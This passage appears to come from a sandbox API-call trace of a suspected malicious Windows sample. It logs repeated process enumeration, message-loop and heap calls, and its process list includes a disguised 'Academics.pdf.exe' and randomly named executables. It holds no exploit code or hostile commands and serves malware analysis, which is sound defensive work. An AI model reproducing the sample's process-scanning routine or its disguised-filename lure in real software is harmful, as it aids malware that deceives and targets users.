th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.876] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0295.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0295.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0295.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0295.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0295.881] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0295.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0295.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0295.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0295.885] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0295.886] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0295.887] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0295.890] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0295.891] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0295.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0295.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0295.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0295.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0295.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0295.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.897] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.898] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0295.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0295.901] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.902] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0295.903] CloseHandle (hObject=0x294) returned 1 [0295.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0295.903] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.904] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0295.906] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0295.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0295.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0295.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0295.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0295.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0295.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0295.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.920] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.921] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0295.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0295.925] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0295.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0295.927] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0295.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0295.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0295.932] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0295.932] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0295.933] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0295.934] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0295.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0295.936] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0295.937] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0295.938] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0295.938] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0295.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0295.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0295.941] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0295.942] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0295.943] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0295.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0295.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0295.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0295.946] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.947] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.948] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0295.949] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.950] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0295.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0295.952] CloseHandle (hObject=0x294) returned 1 [0295.952] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0295.952] TranslateMessage (lpMsg=0x8bf970) returned 0 [0295.953] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0295.953] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0295.953] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0295.953] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0295.953] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0295.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0295.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0295.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0295.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0295.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0295.955] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.956] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 